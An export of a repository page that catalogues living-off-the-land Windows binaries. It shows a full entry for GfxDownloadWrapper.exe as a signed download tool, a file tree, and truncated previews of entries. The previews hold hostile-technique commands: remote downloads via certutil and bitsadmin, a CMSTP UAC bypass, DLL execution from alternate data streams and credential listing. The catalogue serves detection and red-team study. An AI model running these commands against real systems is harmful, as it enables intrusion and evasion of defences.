Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
Author: Jesus Galvez
Created: 2019-12-27
Commands:
  - Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
    Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
    Usecase: Download file from internet
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10
Full_Path:
  - Path: c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_0e9c57ae3396e055\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_209bd95d56b1ac2d\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_3fa2a843f8b7f16d\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_85c860f05274baa0\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_f7412e3e3404de80\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_feb9f1cf05b0de58\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_0219cc1c7085a93f\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_df4f60b1cae9b14a\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_16eb18b0e2526e57\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_1c77f1231c19bc72\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_31c60cc38cfcca28\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_82f69cea8b2d928f\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_b4d94f3e41ceb839\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0606619cc97463de\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0e95edab338ad669\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_22aac1442d387216\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2461d914696db722\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_29d727269a34edf5\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2caf76dbce56546d\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_353320edb98da643\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_4ea0ed0af1507894\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_56a48f4f1c2da7a7\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_64f23fdadb76a511\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_668dd0c6d3f9fa0e\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6be8e5b7f731a6e5\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6dad7e4e9a8fa889\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6df442103a1937a4\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_767e7683f9ad126c\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_8644298f665a12c4\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_868acf86149aef5d\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_92cf9d9d84f1d3db\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_93239c65f222d453\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_9de8154b682af864\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_a7428663aca90897\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_ad7cb5e55a410add\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_afbf41cf8ab202d7\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_d193c96475eaa96e\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_db953c52208ada71\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e7523682cc7528cc\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.
Download .txt
gitextract_55_rj3ap/

├── .gitattributes
├── .github/
│   ├── .yamllint
│   ├── CODEOWNERS
│   ├── workflows/
│   │   ├── gh-pages.yml
│   │   ├── validation.py
│   │   └── yaml-linting.yml
│   └── yaml-lint-reviewdog.yml.bak
├── Archive-Old-Version/
│   ├── LOLUtilz/
│   │   ├── OSBinaries/
│   │   │   ├── Explorer.yml
│   │   │   ├── Netsh.yml
│   │   │   ├── Nltest.yml
│   │   │   ├── Openwith.yml
│   │   │   ├── Powershell.yml
│   │   │   ├── Psr.yml
│   │   │   └── Robocopy.yml
│   │   ├── OtherBinaries/
│   │   │   ├── AcroRd32.yml
│   │   │   ├── Gpup.yml
│   │   │   ├── Nlnotes.yml
│   │   │   ├── Notes.yml
│   │   │   ├── Nvudisp.yml
│   │   │   ├── Nvuhda6.yml
│   │   │   ├── ROCCAT_Swarm.yml
│   │   │   ├── RunCmd_X64.yml
│   │   │   ├── Setup.yml
│   │   │   ├── Upload.yml
│   │   │   ├── Usbinst.yml
│   │   │   ├── VBoxDrvInst.yml
│   │   │   └── aswrundll.yml
│   │   ├── OtherMSBinaries/
│   │   │   └── Winword.yml
│   │   └── OtherScripts/
│   │       └── Testxlst.yml
│   ├── OSBinaries/
│   │   ├── Atbroker.exe.md
│   │   ├── Bash.exe.md
│   │   ├── Bitsadmin.exe.md
│   │   ├── Certutil.exe.md
│   │   ├── Cmdkey.exe.md
│   │   ├── Cmstp.exe.md
│   │   ├── Control.exe.md
│   │   ├── Csc.exe.md
│   │   ├── Cscript.exe.md
│   │   ├── Dfsvc.exe.md
│   │   ├── Diskshadow.exe.md
│   │   ├── Dnscmd.exe.md
│   │   ├── Esentutl.exe.md
│   │   ├── Expand.exe.md
│   │   ├── Explorer.exe.md
│   │   ├── Extexport.exe.md
│   │   ├── Extrac32.exe.md
│   │   ├── Findstr.exe.md
│   │   ├── Forfiles.exe.md
│   │   ├── Gpscript.exe.md
│   │   ├── IEExec.exe.md
│   │   ├── Ie4unit.exe.md
│   │   ├── InfDefaultInstall.exe.md
│   │   ├── InstallUtil.exe.md
│   │   ├── Makecab.exe.md
│   │   ├── Mavinject.exe.md
│   │   ├── Microsoft.Wrokflow.Compiler.xml
│   │   ├── Microsoft.Wrokflow.Compiler.xoml
│   │   ├── Msbuild.exe.md
│   │   ├── Msconfig.exe.md
│   │   ├── Msdt.exe.md
│   │   ├── Msiexec.exe.md
│   │   ├── Netsh.exe.md
│   │   ├── Nltest.exe.md
│   │   ├── Openwith.exe.md
│   │   ├── Payload/
│   │   │   ├── Cmstp.inf
│   │   │   ├── Cmstp_calc.sct
│   │   │   ├── Evil.xbap
│   │   │   ├── Infdefaultinstall.inf
│   │   │   ├── Infdefaultinstall_calc.sct
│   │   │   ├── Msbuild.csproj
│   │   │   ├── Mshta_calc.sct
│   │   │   ├── PCW8E57.xml
│   │   │   ├── Regsvr32_calc.sct
│   │   │   ├── Wmic_calc.xsl
│   │   │   ├── file.rsp
│   │   │   └── mscfgtlc.xml
│   │   ├── Pcalua.exe.md
│   │   ├── Pcwrun.exe.md
│   │   ├── Powershell.exe.md
│   │   ├── PresentationHost.exe.md
│   │   ├── Print.exe.md
│   │   ├── Psr.exe.md
│   │   ├── Regasm.exe.md
│   │   ├── Register-cimprovider.exe.md
│   │   ├── Regsvcs.exe.md
│   │   ├── Regsvr32.exe.md
│   │   ├── Replace.exe.md
│   │   ├── Robocopy.exe.md
│   │   ├── Rpcping.exe.md
│   │   ├── Rundll32.exe.md
│   │   ├── Runonce.exe.md
│   │   ├── Runscripthelper.exe.md
│   │   ├── SC.exe.md
│   │   ├── Scriptrunner.exe.md
│   │   ├── SyncAppvPublishingServer.exe.md
│   │   ├── WMIC.exe.md
│   │   ├── Wab.exe.md
│   │   ├── Wscript.exe.md
│   │   ├── Xwizard.exe.md
│   │   ├── hh.exe.md
│   │   ├── mshta.exe.md
│   │   ├── odbcconf.exe.md
│   │   ├── reg.exe.md
│   │   └── regedit.exe.md
│   ├── OSLibraries/
│   │   ├── Advpack.dll.md
│   │   ├── Ieadvpack.dll.md
│   │   ├── Ieframe.dll.md
│   │   ├── Mshtml.dll.md
│   │   ├── Payload/
│   │   │   ├── Advpack.inf
│   │   │   ├── Advpack_calc.sct
│   │   │   ├── Ieadvpack.inf
│   │   │   └── Ieadvpack_calc.sct
│   │   ├── Pcwutl.dll.md
│   │   ├── Setupapi.dll.md
│   │   ├── Shdocvw.dll.md
│   │   ├── Shell32.dll.md
│   │   ├── Syssetup.dll.md
│   │   ├── Url.dll.md
│   │   └── Zipfldr.dll.md
│   ├── OSScripts/
│   │   ├── CL_Invocation.ps1.md
│   │   ├── CL_Mutexverifiers.ps1.md
│   │   ├── Manage-bde.wsf.md
│   │   ├── Payload/
│   │   │   ├── Pubprn_calc.sct
│   │   │   ├── Slmgr.reg
│   │   │   └── Slmgr_calc.sct
│   │   ├── Pubprn.vbs.md
│   │   ├── Slmgr.vbs.md
│   │   ├── SyncAppvPublishingServer.vbs.md
│   │   ├── Winrm.vbs.md
│   │   └── pester.bat.md
│   ├── OtherBinaries/
│   │   ├── AcroRd32.exe.md
│   │   ├── Gpup.exe.md
│   │   ├── Nlnotes.exe.md
│   │   ├── Notes.exe.md
│   │   ├── Nvudisp.exe.md
│   │   ├── Nvuhda6.exe.md
│   │   ├── ROCCAT_Swarm.exe.md
│   │   ├── Setup.exe.md
│   │   ├── Usbinst.exe.md
│   │   └── VBoxDrvInst.exe.md
│   ├── OtherMSBinaries/
│   │   ├── Appvlp.exe.md
│   │   ├── Bginfo.exe.md
│   │   ├── Cdb.exe.md
│   │   ├── Dxcap.exe.md
│   │   ├── Mftrace.exe.md
│   │   ├── Msdeploy.exe.md
│   │   ├── Payload/
│   │   │   └── Cdb_calc.wds
│   │   ├── SQLToolsPS.exe.md
│   │   ├── Sqldumper.exe.md
│   │   ├── Sqlps.exe.md
│   │   ├── Tracker.exe.md
│   │   ├── csi.exe.md
│   │   ├── dnx.exe.md
│   │   ├── msxsl.exe.md
│   │   ├── rcsi.exe.md
│   │   ├── te.exe.md
│   │   ├── vsjitdebugger.exe.md
│   │   └── winword.exe.md
│   └── OtherScripts/
│       └── testxlst.js.md
├── Backlog.txt
├── CONTRIBUTING.md
├── CategoryList.md
├── LICENSE
├── NOTICE.md
├── README.md
├── YML-Template.yml
└── yml/
    ├── HonorableMentions/
    │   ├── Code.yml
    │   ├── GfxDownloadWrapper.yml
    │   └── PowerShell.yml
    ├── OSBinaries/
    │   ├── Addinutil.yml
    │   ├── AppInstaller.yml
    │   ├── Aspnet_Compiler.yml
    │   ├── At.yml
    │   ├── Atbroker.yml
    │   ├── Bash.yml
    │   ├── Bitsadmin.yml
    │   ├── Certoc.yml
    │   ├── Certreq.yml
    │   ├── Certutil.yml
    │   ├── Change.yml
    │   ├── Cipher.yml
    │   ├── Cmd.yml
    │   ├── Cmdkey.yml
    │   ├── Cmdl32.yml
    │   ├── Cmstp.yml
    │   ├── Colorcpl.yml
    │   ├── ComputerDefaults.yml
    │   ├── ConfigSecurityPolicy.yml
    │   ├── Conhost.yml
    │   ├── Control.yml
    │   ├── Csc.yml
    │   ├── Cscript.yml
    │   ├── CustomShellHost.yml
    │   ├── DataSvcUtil.yml
    │   ├── Desktopimgdownldr.yml
    │   ├── DeviceCredentialDeployment.yml
    │   ├── Dfsvc.yml
    │   ├── Diantz.yml
    │   ├── Diskshadow.yml
    │   ├── Dnscmd.yml
    │   ├── Esentutl.yml
    │   ├── Eudcedit.yml
    │   ├── Eventvwr.yml
    │   ├── Expand.yml
    │   ├── Explorer.yml
    │   ├── Extexport.yml
    │   ├── Extrac32.yml
    │   ├── Findstr.yml
    │   ├── Finger.yml
    │   ├── FltMC.yml
    │   ├── Forfiles.yml
    │   ├── Fsutil.yml
    │   ├── Ftp.yml
    │   ├── Gpscript.yml
    │   ├── Hh.yml
    │   ├── IMEWDBLD.yml
    │   ├── Ie4uinit.yml
    │   ├── Iediagcmd.yml
    │   ├── Ieexec.yml
    │   ├── Ilasm.yml
    │   ├── Infdefaultinstall.yml
    │   ├── Installutil.yml
    │   ├── Iscsicpl.yml
    │   ├── Jsc.yml
    │   ├── Ldifde.yml
    │   ├── Makecab.yml
    │   ├── Mavinject.yml
    │   ├── Microsoft.Workflow.Compiler.yml
    │   ├── Mmc.yml
    │   ├── MpCmdRun.yml
    │   ├── Msbuild.yml
    │   ├── Msconfig.yml
    │   ├── Msdt.yml
    │   ├── Msedge.yml
    │   ├── Mshta.yml
    │   ├── Msiexec.yml
    │   ├── Netsh.yml
    │   ├── Ngen.yml
    │   ├── Odbcconf.yml
    │   ├── OfflineScannerShell.yml
    │   ├── OneDriveStandaloneUpdater.yml
    │   ├── Pcalua.yml
    │   ├── Pcwrun.yml
    │   ├── Pktmon.yml
    │   ├── Pnputil.yml
    │   ├── Presentationhost.yml
    │   ├── Print.yml
    │   ├── PrintBrm.yml
    │   ├── Provlaunch.yml
    │   ├── Psr.yml
    │   ├── Query.yml
    │   ├── Rasautou.yml
    │   ├── Rdrleakdiag.yml
    │   ├── Reg.yml
    │   ├── Regasm.yml
    │   ├── Regedit.yml
    │   ├── Regini.yml
    │   ├── Register-cimprovider.yml
    │   ├── Regsvcs.yml
    │   ├── Regsvr32.yml
    │   ├── Replace.yml
    │   ├── Reset.yml
    │   ├── Rpcping.yml
    │   ├── Rundll32.yml
    │   ├── Runexehelper.yml
    │   ├── Runonce.yml
    │   ├── Runscripthelper.yml
    │   ├── Sc.yml
    │   ├── Schtasks.yml
    │   ├── Scriptrunner.yml
    │   ├── Setres.yml
    │   ├── SettingSyncHost.yml
    │   ├── Sftp.yml
    │   ├── Sigverif.yml
    │   ├── Ssh.yml
    │   ├── Stordiag.yml
    │   ├── Syncappvpublishingserver.yml
    │   ├── Tar.yml
    │   ├── Ttdinject.yml
    │   ├── Tttracer.yml
    │   ├── Unregmp2.yml
    │   ├── Vbc.yml
    │   ├── Verclsid.yml
    │   ├── Wab.yml
    │   ├── Wbadmin.yml
    │   ├── Wbemtest.yml
    │   ├── Winget.yml
    │   ├── Wlrmdr.yml
    │   ├── Wmic.yml
    │   ├── WorkFolders.yml
    │   ├── Wscript.yml
    │   ├── Wsreset.yml
    │   ├── Wuauclt.yml
    │   ├── Xwizard.yml
    │   ├── msedge_proxy.yml
    │   ├── msedgewebview2.yml
    │   ├── odbcad32.yml
    │   ├── write.yml
    │   └── wt.yml
    ├── OSLibraries/
    │   ├── Advpack.yml
    │   ├── Desk.yml
    │   ├── Dfshim.yml
    │   ├── Ieadvpack.yml
    │   ├── Ieframe.yml
    │   ├── Mshtml.yml
    │   ├── Pcwutl.yml
    │   ├── PhotoViewer.yml
    │   ├── Scrobj.yml
    │   ├── Setupapi.yml
    │   ├── Shdocvw.yml
    │   ├── Shell32.yml
    │   ├── Shimgvw.yml
    │   ├── Syssetup.yml
    │   ├── Url.yml
    │   ├── Zipfldr.yml
    │   └── comsvcs.yml
    ├── OSScripts/
    │   ├── CL_LoadAssembly.yml
    │   ├── CL_mutexverifiers.yml
    │   ├── Cl_invocation.yml
    │   ├── Launch-VsDevShell.yml
    │   ├── Manage-bde.yml
    │   ├── Pubprn.yml
    │   ├── Syncappvpublishingserver.yml
    │   ├── UtilityFunctions.yml
    │   ├── Winrm.yml
    │   └── pester.yml
    └── OtherMSBinaries/
        ├── AccCheckConsole.yml
        ├── Adplus.yml
        ├── Agentexecutor.yml
        ├── AppLauncher.yml
        ├── Appcert.yml
        ├── Appvlp.yml
        ├── Bcp.yml
        ├── Bginfo.yml
        ├── Cdb.yml
        ├── Coregen.yml
        ├── Createdump.yml
        ├── Csi.yml
        ├── DefaultPack.yml
        ├── Devinit.yml
        ├── Devtoolslauncher.yml
        ├── Dnx.yml
        ├── Dotnet.yml
        ├── Dsdbutil.yml
        ├── Dtutil.yml
        ├── Dump64.yml
        ├── DumpMinitool.yml
        ├── Dxcap.yml
        ├── ECMangen.yml
        ├── Excel.yml
        ├── Fsi.yml
        ├── FsiAnyCpu.yml
        ├── IntelliTrace.yml
        ├── Logger.yml
        ├── Mftrace.yml
        ├── Microsoft.NodejsTools.PressAnyKey.yml
        ├── Mpiexec.yml
        ├── Msaccess.yml
        ├── Msdeploy.yml
        ├── MsoHtmEd.yml
        ├── Mspub.yml
        ├── Msxsl.yml
        ├── Nmcap.yml
        ├── Ntdsutil.yml
        ├── Ntsd.yml
        ├── OpenConsole.yml
        ├── Pixtool.yml
        ├── Powerpnt.yml
        ├── Procdump.yml
        ├── ProtocolHandler.yml
        ├── Rcsi.yml
        ├── Remote.yml
        ├── Sqldumper.yml
        ├── Sqlps.yml
        ├── Sqltoolsps.yml
        ├── Squirrel.yml
        ├── Te.yml
        ├── Teams.yml
        ├── Testwindowremoteagent.yml
        ├── Tracker.yml
        ├── Update.yml
        ├── VSDiagnostics.yml
        ├── VSIISExeLauncher.yml
        ├── Visio.yml
        ├── VisualUiaVerifyNative.yml
        ├── VsLaunchBrowser.yml
        ├── Vshadow.yml
        ├── Vsjitdebugger.yml
        ├── WFMFormat.yml
        ├── Wfc.yml
        ├── WinDbg.yml
        ├── Winproj.yml
        ├── Winword.yml
        ├── Wsl.yml
        ├── XBootMgr.yml
        ├── XBootMgrSleep.yml
        ├── devtunnels.yml
        ├── vsls-agent.yml
        ├── vstest.console.yml
        ├── winfile.yml
        └── xsd.yml
Download .txt
SYMBOL INDEX (12 symbols across 1 files)

FILE: .github/workflows/validation.py
  class LolbasModel (line 16) | class LolbasModel(BaseModel):
  class AliasItem (line 20) | class AliasItem(LolbasModel):
  class TagItem (line 24) | class TagItem(RootModel[dict[constr(pattern=r'^[A-Z]'), str]]):
  class CommandItem (line 28) | class CommandItem(LolbasModel):
  class FullPathItem (line 39) | class FullPathItem(LolbasModel):
  class CodeSampleItem (line 43) | class CodeSampleItem(LolbasModel):
  class DetectionItem (line 47) | class DetectionItem(LolbasModel):
    method validate_exclusive_urls (line 56) | def validate_exclusive_urls(cls, values):
  class ResourceItem (line 66) | class ResourceItem(LolbasModel):
  class AcknowledgementItem (line 70) | class AcknowledgementItem(LolbasModel):
  class MainModel (line 75) | class MainModel(LolbasModel):
  function escaper (line 90) | def escaper(x): return x.replace('%', '%25').replace('\r', '%0D').replac...
Condensed preview — 401 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (656K chars).
[
  {
    "path": ".gitattributes",
    "chars": 18,
    "preview": "*.yml text eol=lf\n"
  },
  {
    "path": ".github/.yamllint",
    "chars": 295,
    "preview": "---\nextends: default\nyaml-files:\n  - '*.yml'\nrules:\n  new-line-at-end-of-file:\n    level: error\n  trailing-spaces:\n    l"
  },
  {
    "path": ".github/CODEOWNERS",
    "chars": 30,
    "preview": "* @LOLBAS-Project/lolbas-team\n"
  },
  {
    "path": ".github/workflows/gh-pages.yml",
    "chars": 1244,
    "preview": "---\nname: Update LOLBAS-Project.github.io\non:\n  workflow_run:\n    workflows: [\"PUSH & PULL REQUEST - YAML Lint and Schem"
  },
  {
    "path": ".github/workflows/validation.py",
    "chars": 4214,
    "preview": "import glob\nimport os\nimport sys\nfrom typing import List, Literal, Optional\n\nimport yaml\nfrom pydantic import BaseModel,"
  },
  {
    "path": ".github/workflows/yaml-linting.yml",
    "chars": 1623,
    "preview": "---\nname: PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks\non: [push,pull_request]\n\njobs:\n  lintFiles:\n    i"
  },
  {
    "path": ".github/yaml-lint-reviewdog.yml.bak",
    "chars": 1155,
    "preview": "---\nname: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks\non: [pull_request]\n\njobs:\n  lintFiles:\n    runs-on: ub"
  },
  {
    "path": "Archive-Old-Version/LOLUtilz/OSBinaries/Explorer.yml",
    "chars": 437,
    "preview": "---\nName: Explorer.exe\nDescription: Execute\nAuthor: ''\nCreated: '2018-05-25'\nCategories: []\nCommands:\n  - Command: explo"
  },
  {
    "path": "Archive-Old-Version/LOLUtilz/OSBinaries/Netsh.yml",
    "chars": 1069,
    "preview": "---\nName: Netsh.exe\nDescription: Execute, Surveillance\nAuthor: ''\nCreated: '2018-05-25'\nCategories: []\nCommands:\n  - Com"
  },
  {
    "path": "Archive-Old-Version/LOLUtilz/OSBinaries/Nltest.yml",
    "chars": 400,
    "preview": "---\nName: Nltest.exe\nDescription: Credentials\nAuthor: ''\nCreated: 2018-05-25\nCommands:\n  - Command: nltest.exe /SERVER:1"
  },
  {
    "path": "Archive-Old-Version/LOLUtilz/OSBinaries/Openwith.yml",
    "chars": 558,
    "preview": "---\nName: Openwith.exe\nDescription: Execute\nAuthor: ''\nCreated: '2018-05-25'\nCommands:\n  - Command: OpenWith.exe /c C:\\t"
  },
  {
    "path": "Archive-Old-Version/LOLUtilz/OSBinaries/Powershell.yml",
    "chars": 554,
    "preview": "---\nName: Powershell.exe\nDescription: Execute, Read ADS\nAuthor: ''\nCreated: '2018-05-25'\nCommands:\n  - Command: powershe"
  },
  {
    "path": "Archive-Old-Version/LOLUtilz/OSBinaries/Psr.yml",
    "chars": 757,
    "preview": "---\nName: Psr.exe\nDescription: Surveillance\nAuthor: ''\nCreated: '2018-05-25'\nCategories: []\nCommands:\n  - Command: psr.e"
  },
  {
    "path": "Archive-Old-Version/LOLUtilz/OSBinaries/Robocopy.yml",
    "chars": 647,
    "preview": "---\nName: Robocopy.exe\nDescription: Copy\nAuthor: ''\nCreated: 2018-05-25\nCategories: []\nCommands:\n  - Command: Robocopy.e"
  },
  {
    "path": "Archive-Old-Version/LOLUtilz/OtherBinaries/AcroRd32.yml",
    "chars": 534,
    "preview": "---\nName: AcroRd32.exe\nDescription: Execute\nAuthor: ''\nCreated: 2018-05-25\nCommands:\n  - Command: Replace C:\\Program Fil"
  },
  {
    "path": "Archive-Old-Version/LOLUtilz/OtherBinaries/Gpup.yml",
    "chars": 476,
    "preview": "---\nName: Gpup.exe\nDescription: Execute\nAuthor: ''\nCreated: 2018-05-25\nCommands:\n  - Command: Gpup.exe -w whatever -e c:"
  },
  {
    "path": "Archive-Old-Version/LOLUtilz/OtherBinaries/Nlnotes.yml",
    "chars": 619,
    "preview": "---\nName: Nlnotes.exe\nDescription: Execute\nAuthor: ''\nCreated: 2018-05-25\nCommands:\n  - Command: NLNOTES.EXE /authentica"
  },
  {
    "path": "Archive-Old-Version/LOLUtilz/OtherBinaries/Notes.yml",
    "chars": 600,
    "preview": "---\nName: Notes.exe\nDescription: Execute\nAuthor: ''\nCreated: 2018-05-25\nCommands:\n  - Command: Notes.exe \"=N:\\Lotus\\Note"
  },
  {
    "path": "Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml",
    "chars": 1033,
    "preview": "---\nName: Nvudisp.exe\nDescription: Execute, Copy, Add registry, Create shortcut, kill process\nAuthor: ''\nCreated: 2018-0"
  },
  {
    "path": "Archive-Old-Version/LOLUtilz/OtherBinaries/Nvuhda6.yml",
    "chars": 982,
    "preview": "---\nName: Nvuhda6.exe\nDescription: Execute, Copy, Add registry, Create shortcut, kill process\nAuthor: ''\nCreated: 2018-0"
  },
  {
    "path": "Archive-Old-Version/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml",
    "chars": 495,
    "preview": "---\nName: ROCCAT_Swarm.exe\nDescription: Execute\nAuthor: ''\nCreated: 2018-05-25\nCommands:\n  - Command: Replace ROCCAT_Swa"
  },
  {
    "path": "Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml",
    "chars": 749,
    "preview": "---\nName: RunCmd_X64.exe\nDescription: A tool to execute a command file\nAuthor: Bart\nCreated: 2019-03-17\nCommands:\n  - Co"
  },
  {
    "path": "Archive-Old-Version/LOLUtilz/OtherBinaries/Setup.yml",
    "chars": 444,
    "preview": "---\nName: Setup.exe\nDescription: Execute\nAuthor: ''\nCreated: 2018-05-25\nCommands:\n  - Command: Run Setup.exe\n    Descrip"
  },
  {
    "path": "Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml",
    "chars": 717,
    "preview": "---\nName: Update.exe\nDescription: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp insta"
  },
  {
    "path": "Archive-Old-Version/LOLUtilz/OtherBinaries/Usbinst.yml",
    "chars": 512,
    "preview": "---\nName: Usbinst.exe\nDescription: Execute\nAuthor: ''\nCreated: 2018-05-25\nCommands:\n  - Command: Usbinst.exe InstallHinf"
  },
  {
    "path": "Archive-Old-Version/LOLUtilz/OtherBinaries/VBoxDrvInst.yml",
    "chars": 500,
    "preview": "---\nName: VBoxDrvInst.exe\nDescription: Persistence\nAuthor: ''\nCreated: 2018-05-25\nCommands:\n  - Command: VBoxDrvInst.exe"
  },
  {
    "path": "Archive-Old-Version/LOLUtilz/OtherBinaries/aswrundll.yml",
    "chars": 934,
    "preview": "Name: aswrundll.exe\nDescription: This process is used by AVAST antivirus to run and execute any modules\nAuthor: Eli Sale"
  },
  {
    "path": "Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml",
    "chars": 763,
    "preview": "---\nName: winword.exe\nDescription: Document editor included with Microsoft Office.\nAuthor: 'Oddvar Moe'\nCreated: 2018-05"
  },
  {
    "path": "Archive-Old-Version/LOLUtilz/OtherScripts/Testxlst.yml",
    "chars": 978,
    "preview": "---\nName: testxlst.js\nDescription: Script included with Pywin32.\nAuthor: 'Oddvar Moe'\nCreated: 2018-05-25\nCommands:\n  - "
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Atbroker.exe.md",
    "chars": 489,
    "preview": "## Atbroker.exe\n* Functions: Execute\n```\n\nATBroker.exe /start malware\nStart a registered Assistive Technology (AT).\n```\n"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Bash.exe.md",
    "chars": 163,
    "preview": "## Bash.exe\n* Functions: Execute\n```\n\nbash.exe -c calc.exe\nExecute calc.exe.\n```\n   \n* Resources:   \n  * \n   \n* Full pat"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Bitsadmin.exe.md",
    "chars": 1843,
    "preview": "## Bitsadmin.exe\n* Functions: Execute, Download, Copy, Read ADS\n```\n\nbitsadmin /create 1\nbitsadmin /addfile 1 c:\\windows"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Certutil.exe.md",
    "chars": 874,
    "preview": "## Certutil.exe\n* Functions: Download, Add ADS, Decode, Encode\n```\n\ncertutil.exe -urlcache -split -f http://7-zip.org/a/"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Cmdkey.exe.md",
    "chars": 311,
    "preview": "## Cmdkey.exe\n* Functions: Credentials\n```\n\ncmdkey /list\nList cached credentials.\n```\n   \n* Resources:   \n  * https://ww"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Cmstp.exe.md",
    "chars": 1213,
    "preview": "## Cmstp.exe\n* Functions: Execute, UACBypass\n```\n\ncmstp.exe /ni /s c:\\cmstp\\CorpVPN.inf\nSilently installs a specially fo"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Control.exe.md",
    "chars": 658,
    "preview": "## Control.exe\n* Functions: Execute, Read ADS\n```\n\ncontrol.exe c:\\windows\\tasks\\file.txt:evil.dll\nExecute evil.dll which"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Csc.exe.md",
    "chars": 502,
    "preview": "## Csc.exe\n* Functions: Compile\n```\n\ncsc -out:My.exe File.cs\nUse CSC.EXE to compile C# code stored in File.cs and output"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Cscript.exe.md",
    "chars": 514,
    "preview": "## Cscript.exe\n* Functions: Execute, Read ADS\n```\n\ncscript c:\\ads\\file.txt:script.vbs\nUse cscript.exe to exectute a Visu"
  },
  {
    "path": "Archive-Old-Version/OSBinaries/Dfsvc.exe.md",
    "chars": 507,
    "preview": "## Dfsvc.exe\n* Functions: Execute\n```\n\nMissing Example\n\n```\n   \n* Resources:   \n  * https://github.com/api0cradle/ShmooC"
  },
  {
